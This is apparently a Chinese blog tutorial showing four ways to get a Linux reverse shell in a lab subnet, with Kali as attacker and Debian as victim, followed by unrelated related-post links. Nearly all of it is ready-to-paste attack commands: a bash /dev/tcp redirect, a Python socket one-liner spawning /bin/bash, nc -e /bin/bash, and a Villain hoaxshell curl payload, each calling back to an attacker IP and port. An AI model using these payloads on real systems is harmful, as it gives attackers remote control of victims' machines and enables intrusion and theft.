2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

实验环境准备(同一个网段下,我是桥接的虚拟机)

一、bash反弹shell

二、python反弹shell

三、nc反弹shell

四、villain反弹shell


实验环境准备(同一个网段下,我是桥接的虚拟机)

一台kali的linux(攻击者)

一台centos7/debian[另一个linux](受害者)

一、bash反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

nc -lvp 自定义端口号

2、debian(受害者)运行命令

 bash -i >& /dev/tcp/攻击者主机的ip/自定义的端口号 0>&1

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

二、python反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

nc -lvp 自定义端口号

2、debian(受害者)运行命令

注意修改攻击者的ip和端口号

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('攻击者的主机ip',自定义的端口号));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

三、nc反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

nc -lvp 自定义端口号

2、debian(受害者)运行命令

nc -e /bin/bash 攻击者ip 自定义的端口号

3、结果在kali这边输出,(这个不回显)我们可以直接执行whoami查看权限

whoami

四、villain反弹shell

1、kali(攻击者)运行命令

①运行villain,需要先安装哦

villain

②生成linux的payload命令复制灰色区域的文字到debian的命令行中

温馨提示:可以在villain中使用help generate查看windows的payload生成方法

generate payload=linux/hoaxshell/sh_curl lhost=eth0

2、debian(受害者)复制并运行刚才生成的payload命令

3、结果在kali这边输出

②我们查看上线的主机

sessions

②进入shell,shell session的英文编码id,控制一下debian(受害者)

shell sessionID

③whoami看一下权限

whoami
相关推荐
摸鱼也很难1 小时前
Docker 镜像加速和配置的分享 && 云服务器搭建beef-xss
运维·docker·容器
watermelonoops2 小时前
Deepin和Windows传文件(Xftp,WinSCP)
linux·ssh·deepin·winscp·xftp
woshilys2 小时前
sql server 查询对象的修改时间
运维·数据库·sqlserver
疯狂飙车的蜗牛3 小时前
从零玩转CanMV-K230(4)-小核Linux驱动开发参考
linux·运维·驱动开发
恩爸编程3 小时前
探索 Nginx:Web 世界的幕后英雄
运维·nginx·nginx反向代理·nginx是什么·nginx静态资源服务器·nginx服务器·nginx解决哪些问题
Michaelwubo5 小时前
Docker dockerfile镜像编码 centos7
运维·docker·容器
远游客07135 小时前
centos stream 8下载安装遇到的坑
linux·服务器·centos
马甲是掉不了一点的<.<5 小时前
本地电脑使用命令行上传文件至远程服务器
linux·scp·cmd·远程文件上传
jingyu飞鸟5 小时前
centos-stream9系统安装docker
linux·docker·centos
好像是个likun5 小时前
使用docker拉取镜像很慢或者总是超时的问题
运维·docker·容器